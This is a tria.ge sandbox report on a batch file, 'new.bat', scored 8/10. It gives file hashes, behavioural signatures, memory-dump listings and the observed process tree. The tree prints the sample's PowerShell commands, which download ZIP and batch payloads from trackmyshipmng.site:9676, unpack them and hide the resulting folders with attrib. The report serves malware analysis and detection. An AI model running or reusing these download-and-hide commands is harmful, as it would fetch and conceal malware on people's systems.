Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Overview

overview

10

Static

static

1

new.bat

windows7-x64

8

new.bat

windows10-1703-x64

10

Analysis

  • max time kernel
    15s
  • max time network
    18s
  • platform
    windows7_x64
  • resource
    win7-20240705-en
  • resource tags

    arch:x64arch:x86image:win7-20240705-enlocale:en-usos:windows7-x64system
  • submitted
    15/08/2024, 16:50

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    new.bat

  • Size

    18.0MB

  • MD5

    35168f928a81982fc428113f484ea21e

  • SHA1

    2029d685911c351cea2857e12c1755df330e4978

  • SHA256

    496ba960a9fdf59b00191e7750cfc3940fe5a49610988799cbe3d9cc5d3f5344

  • SHA512

    4b2dc4e91c04180cb372460231e75270252f389231d759bcd96af05dbb479647d39e860e3f22dcf7041e8ec214a1a12125e8ccf52cd26f87d13ee163d58726ec

  • SSDEEP

    48:HmGJ3NlBmmTaQgTymDyb4J7rmxo6rmxoAbYk8OkeFhCaoe1aLHtZQ5ImvBSygyGV:H9FmmNfjwhSCu7OmLT7SkoLEu3S0yhr

Score
8/10
execution

Malware Config

Signatures

  • Command and Scripting Interpreter: PowerShell 1 TTPs 5 IoCs

    Using powershell.exe command.

    execution
  • Delays execution with timeout.exe 1 IoCs
    evasion
  • Suspicious behavior: EnumeratesProcesses 5 IoCs
  • Suspicious use of AdjustPrivilegeToken 5 IoCs
  • Suspicious use of WriteProcessMemory 24 IoCs
  • Views/modifies file attributes 1 TTPs 2 IoCs
    evasion

Processes

  • C:\Windows\system32\cmd.exe
    cmd /c "C:\Users\Admin\AppData\Local\Temp\new.bat"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:2176
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command "& { [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; Invoke-WebRequest -Uri 'http://trackmyshipmng.site:9676/DXJS.zip' -OutFile 'C:\Users\Admin\Downloads\DXJS.zip' }"
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:2692
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command "& { Expand-Archive -Path 'C:\Users\Admin\Downloads\DXJS.zip' -DestinationPath 'C:\Users\Admin\Downloads' -Force }"
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:2820
    • C:\Windows\system32\timeout.exe
      timeout /t 5 REM Wait for extraction to finish (adjust timeout as needed)
      2⤵
      • Delays execution with timeout.exe
      PID:2740
    • C:\Windows\system32\attrib.exe
      attrib +h "C:\Users\Admin\Downloads\Python"
      2⤵
      • Views/modifies file attributes
      PID:2500
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command "& { [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; Invoke-WebRequest -Uri 'http://trackmyshipmng.site:9676/startupppp.bat' -OutFile 'C:\Users\Admin\Downloads\startupppp.bat' }"
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:2816
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command "& { [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; Invoke-WebRequest -Uri 'http://trackmyshipmng.site:9676/FTSP.zip' -OutFile 'C:\Users\Admin\Downloads\FTSP.zip' }"
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:268
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command "& { Expand-Archive -Path 'C:\Users\Admin\Downloads\FTSP.zip' -DestinationPath 'C:\Users\Admin\Downloads' -Force }"
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:2680
    • C:\Windows\system32\attrib.exe
      attrib +h "C:\Users\Admin\Downloads\Print"
      2⤵
      • Views/modifies file attributes
      PID:1364

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
    Filesize

    7KB

    MD5

    b4a19d98a1f6fb7b13dbd09c876b1bf6

    SHA1

    020ac698614e2262a53a77f09767b7b25e0c5f08

    SHA256

    334bc694d1a8543421e6f985e981435e9ac6e155a4e685cf7ec376e59520a4ef

    SHA512

    8548dcd00e7a834f7cda271f022179f294258ce2da615730f2dfea1ad2a32315db013835d9f0499016b42b0dab8cbd44946da3ee684df12f6e01b091d851c636

    Download Submit

  • memory/2692-4-0x000007FEF5B0E000-0x000007FEF5B0F000-memory.dmp

    Filesize

    4KB

    Download

  • memory/2692-5-0x000000001B740000-0x000000001BA22000-memory.dmp

    Filesize

    2.9MB

    Download

  • memory/2692-7-0x000007FEF5850000-0x000007FEF61ED000-memory.dmp

    Filesize

    9.6MB

    Download

  • memory/2692-8-0x000007FEF5850000-0x000007FEF61ED000-memory.dmp

    Filesize

    9.6MB

    Download

  • memory/2692-9-0x000007FEF5850000-0x000007FEF61ED000-memory.dmp

    Filesize

    9.6MB

    Download

  • memory/2692-6-0x0000000001BF0000-0x0000000001BF8000-memory.dmp

    Filesize

    32KB

    Download

  • memory/2692-10-0x000007FEF5850000-0x000007FEF61ED000-memory.dmp

    Filesize

    9.6MB

    Download

  • memory/2692-11-0x000007FEF5850000-0x000007FEF61ED000-memory.dmp

    Filesize

    9.6MB

    Download

  • memory/2820-17-0x000000001B7F0000-0x000000001BAD2000-memory.dmp

    Filesize

    2.9MB

    Download

  • memory/2820-18-0x0000000001E80000-0x0000000001E88000-memory.dmp

    Filesize

    32KB

    Download